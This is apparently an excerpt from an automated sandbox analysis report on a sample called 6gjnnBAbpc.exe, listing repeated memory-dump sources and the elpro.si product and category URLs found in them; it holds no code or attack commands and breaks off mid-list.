                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/mollet/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/rotronic/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/shinko-technos/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/wika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/brand/wohler/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/category/aktualno/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/disclaimer/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/elpro-laboratorij-za-kalibracije/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/en/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/232-50-industrijski-manometer-z-bourdonovo-cevjo-10-bar-wika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/232-50-industrijski-manometer-z-bourdonovo-cevjo-250-bar-wika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/a-10-tlacni-pretvornik-tip-tp-a10-1-2-a-0-1000bar-4-20-wika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/a-10-tlacni-pretvornik-tip-tp-a10-1-2-a-0-600bar-4-20-wika/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/analizato
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/aplikacij
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/kamere-en
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/merilnik-
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 